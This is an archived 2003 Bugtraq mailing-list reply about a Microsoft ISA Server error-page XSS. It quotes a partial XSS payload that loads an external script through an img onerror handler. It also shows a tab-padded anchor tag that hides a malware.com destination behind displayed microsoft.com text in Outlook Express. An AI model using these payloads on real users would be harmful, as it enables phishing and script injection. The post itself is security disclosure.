lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 17 Jul 2003 23:05:38 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Subject: Re: Microsoft ISA Server HTTP error handler XSS (TL#007)




 <!-- 

http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%
5Cx2f% 
5Cx2f 

 -->

This is very interesting. A side 'benefit' is that we can mask our 
true url with the same scheme.

For an href in html in order to mask the true destination the <a 
href="....>bloatedcorp.com</a>, can be manipulated by trivial 
javascript to generate a custom representation in the status bar to 
fool our recipient should they 'hover' the mouse over the link.

This can be defeated quite simply like so:

<A href="http://%09%09%09%09%09%09%09 
09www.malware.com">http://www.microsoft.com</A> 

In an html mail message [default in Outlook Express] plus restricted 
zone in Outlook Express 6 [again default] where no scripting is 
allowed, the above link when presented to the recipient in an html 
email message, and tested by 'hovering' the mouse over it, yields 
nothing. Blank. Thereafter accepting the url, transports us to our 
site as required.

End Call

--
http://www.malware.com






Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ